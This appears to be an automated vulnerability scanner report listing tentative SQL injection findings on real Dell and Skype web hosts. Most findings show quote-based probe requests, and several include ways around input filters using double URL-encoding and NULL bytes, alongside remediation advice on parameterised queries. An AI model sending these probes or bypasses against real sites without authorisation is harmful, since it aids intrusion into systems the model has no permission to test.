SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /sna/productdetail.aspx?sku= HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527
Response 1 (redirected)
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 25226
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:30:43 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:30:42 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Dell n ...[SNIP]... ng, handling and other fees apply. U.S. Dell Small Business new purchases only. LIMIT 5 DISCOUNTED OR PROMOTIONAL ITEMS PER CUSTOMER. Dell reserves right to cancel orders arising from pricing or other errors.</div> ...[SNIP]...
Request 2
GET /sna/productdetail.aspx?sku= HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Response 2 (redirected)
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 23596
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:30:43 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Dell n ...[SNIP]...
1.2. http://accessories.us.dell.com/sna/productdetail.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://accessories.us.dell.com
Path: /sna/productdetail.aspx
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /sna/productdetail.aspx?sku=&1%00'=1 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1 (redirected)
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 25481
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:30:36 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:30:36 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Dell n ...[SNIP]... ng, handling and other fees apply. U.S. Dell Small Business new purchases only. LIMIT 5 DISCOUNTED OR PROMOTIONAL ITEMS PER CUSTOMER. Dell reserves right to cancel orders arising from pricing or other errors.</div> ...[SNIP]...
Request 2
GET /sna/productdetail.aspx?sku=&1%00''=1 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2 (redirected)
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 23870
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:30:36 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Dell n ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/Android'/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /t5/Android''/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527
GET /t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<link class="lia-link ...[SNIP]...
1.5. http://community.skype.com/t5/English/ct-p/English [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://community.skype.com
Path: /t5/English/ct-p/English
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/English/ct-p/English?1%00'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
GET /t5/English/ct-p/English?1%00''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<link class="lia-link ...[SNIP]...
1.6. http://community.skype.com/t5/Pagamenti-Fatture-Crediti/bd-p/it_payment [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://community.skype.com
Path: /t5/Pagamenti-Fatture-Crediti/bd-p/it_payment
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/Pagamenti-Fatture-Crediti/bd-p/it_payment?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
GET /t5/Pagamenti-Fatture-Crediti/bd-p/it_payment?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<link class="lia-link ...[SNIP]...
1.7. http://community.skype.com/t5/Skype-Manager/bd-p/Skype_Manager [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://community.skype.com
Path: /t5/Skype-Manager/bd-p/Skype_Manager
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/Skype-Manager/bd-p/Skype_Manager?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
GET /t5/Skype-Manager/bd-p/Skype_Manager?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/Skype-for-Business/bd-p'/pt_business HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
GET /t5/Skype-for-Business/bd-p''/pt_business HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:45:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36420
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/Skype-on-your-TV/bd-p/Skype_on_your_TV HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
GET /t5/Skype-on-your-TV/bd-p/Skype_on_your_TV HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/Support-et-information/bd-p%2527/fr_community HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
GET /t5/Support-et-information/bd-p%2527%2527/fr_community HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:47:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36470
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> Page Not Fou ...[SNIP]...
1.11. http://community.skype.com/t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
GET /t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<link class="lia-link ...[SNIP]...
1.13. http://community.skype.com/t5/Windows/Api-access-control-wont-remember/m-p/134242 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/Windows/Api-access-control-wont-remember/m-p/134242?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
GET /t5/Windows/Api-access-control-wont-remember/m-p/134242?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/Windows/Disabling-Skype-Home-autostart/m-p/64492 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
GET /t5/Windows/Disabling-Skype-Home-autostart/m-p/64492 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close
GET /t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'
GET /t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The REST URL parameter 9 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 9, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 9 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> An Unexpecte ...[SNIP]... <div class="exception-page-message IncorrectValueFormatException lia-component-content" class="exception-page-message IncorrectValueFormatException"> ...[SNIP]... <li> Sorry, your request failed. A notification has been sent to the development team for investigation.<p> ...[SNIP]...
Request 2
GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true%2527%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.18. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/forums/recentpostspage/category-id/English/post-type/message HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'
Request 2
